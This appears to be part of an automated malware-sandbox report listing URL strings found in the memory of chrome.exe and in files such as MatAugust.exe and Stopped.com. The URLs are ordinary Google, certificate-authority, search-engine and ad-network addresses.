Source: chrome.exe, 00000011.00000003.1987903426.0000250C00FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989759004.0000250C01140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989545377.0000250C010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987712081.0000250C00EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989002622.0000250C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989171545.0000250C00F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062257227.0000250C002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988291160.0000250C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987978177.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989030007.0000250C00854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987933158.0000250C01040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000011.00000003.1987903426.0000250C00FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989759004.0000250C01140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989545377.0000250C010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987712081.0000250C00EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989002622.0000250C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989171545.0000250C00F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062257227.0000250C002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988291160.0000250C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987978177.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989030007.0000250C00854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987933158.0000250C01040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000011.00000003.1987903426.0000250C00FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989759004.0000250C01140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989545377.0000250C010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987712081.0000250C00EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989002622.0000250C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989171545.0000250C00F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062257227.0000250C002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988291160.0000250C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987978177.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989030007.0000250C00854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987933158.0000250C01040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000011.00000003.1987903426.0000250C00FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989759004.0000250C01140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989545377.0000250C010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987712081.0000250C00EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989002622.0000250C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989171545.0000250C00F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062257227.0000250C002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988291160.0000250C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987978177.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989030007.0000250C00854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987933158.0000250C01040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000011.00000002.2065290980.0000250C00AE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2061215696.0000250C000EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r4---sn-ab5l6nk6.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT
Source: chrome.exe, 00000011.00000002.2066613703.0000250C00E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000011.00000002.2064782043.0000250C009B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000011.00000002.2064782043.0000250C009B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs%
Source: MatAugust.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Stopped.com.1.dr, Convinced.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: MatAugust.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: MatAugust.exe, Stopped.com.1.dr, Passenger.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: MatAugust.exe	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: chrome.exe, 00000011.00000002.2064782043.0000250C009B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000011.00000002.2064782043.0000250C009B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/a
Source: Stopped.com, 0000000C.00000000.1705629202.00000000007F5000.00000002.00000001.01000000.00000007.sdmp, Stopped.com.1.dr, Born.8.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: chromecache_89.19.dr	String found in binary or memory: http://www.broofa.com
Source: chrome.exe, 00000011.00000002.2067263524.0000250C01070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google-analytics.com;reprt-uri
Source: chrome.exe, 00000011.00000002.2064968329.0000250C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000011.00000002.2064055961.0000250C00789000.00000004.00000800.00020000.00000000.sdmp, 8900hv.12.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000011.00000002.2060775857.0000250C00098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000011.00000002.2062724234.0000250C003F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065792255.0000250C00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000011.00000002.2065792255.0000250C00C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2060458999.0000250C00024000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000011.00000002.2060812721.0000250C000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000011.00000002.2060812721.0000250C000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000011.00000002.2060812721.0000250C000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000011.00000002.2060775857.0000250C00098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chromecache_86.19.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_86.19.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000011.00000002.2065792255.0000250C00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.comS
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/73194
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp, chromecache_86.19.dr, chromecache_89.19.dr	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000011.00000002.2068695162.0000250C01A48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes
Source: cjw47q.12.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: cjw47q.12.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: chrome.exe, 00000011.00000002.2064025241.0000250C0075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067153879.0000250C00FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063143368.0000250C004DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000011.00000002.2067153879.0000250C00FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions%
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico%
Source: 8900hv.12.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000011.00000002.2065657638.0000250C00BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000011.00000002.2065657638.0000250C00BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: 8900hv.12.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000011.00000002.2065516166.0000250C00B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000011.00000002.2065516166.0000250C00B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000011.00000002.2065516166.0000250C00B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000011.00000002.2064782043.0000250C009B0000.00000004.00000800.00020000.00000000.sdmp, 8900hv.12.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000011.00000003.1985213876.0000250C00C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000011.00000002.2063599717.0000250C00670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000011.00000002.2067619227.0000250C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065657638.0000250C00BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067403406.0000250C010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064968329.0000250C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000011.00000002.2067619227.0000250C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067403406.0000250C010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en.
Source: chrome.exe, 00000011.00000003.1985172745.0000250C00C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989116490.0000250C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1991109558.0000250C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989082250.0000250C00C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1984554431.0000250C00C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1984640964.0000250C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1985389637.0000250C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1985213876.0000250C00C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000011.00000002.2057731265.0000085C0079C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1972808804.0000085C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1972624316.0000085C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000011.00000002.2057731265.0000085C0079C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1972808804.0000085C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1972624316.0000085C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000011.00000002.2057731265.0000085C0079C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000011.00000003.2016527035.0000250C0151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2057731265.0000085C0079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017059554.0000250C01524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1973056354.0000085C00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2016559267.0000250C01520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1972808804.0000085C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1972624316.0000085C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000011.00000002.2060458999.0000250C00024000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000011.00000002.2065764987.0000250C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
